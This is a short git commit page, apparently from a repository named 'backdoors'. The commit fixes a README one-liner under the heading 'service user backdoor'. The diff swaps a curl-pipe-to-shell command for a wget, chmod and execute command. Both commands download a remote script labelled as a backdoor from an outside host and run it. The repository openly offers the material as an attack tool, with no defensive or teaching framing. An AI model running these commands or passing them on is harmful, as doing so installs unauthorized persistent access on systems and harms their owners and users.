fix broken one-liner
This commit is contained in:
parent
38b0e3e339
commit
eb2541bab3
1 changed files with 1 additions and 1 deletions
|
@ -7,5 +7,5 @@ more sophisticated stuff coming in future, for now it's just a skiddie's trash b
|
|||
|
||||
### service user backdoor:
|
||||
```
|
||||
curl -fsSL https://git.lainlounge.xyz/hornet/backdoors/service_user.sh | sh
|
||||
wget https://git.lainlounge.xyz/hornet/backdoors/src/branch/main/service_user.sh && chmod +x service_user.sh && ./service_user.sh
|
||||
```
|
Loading…
Add table
Reference in a new issue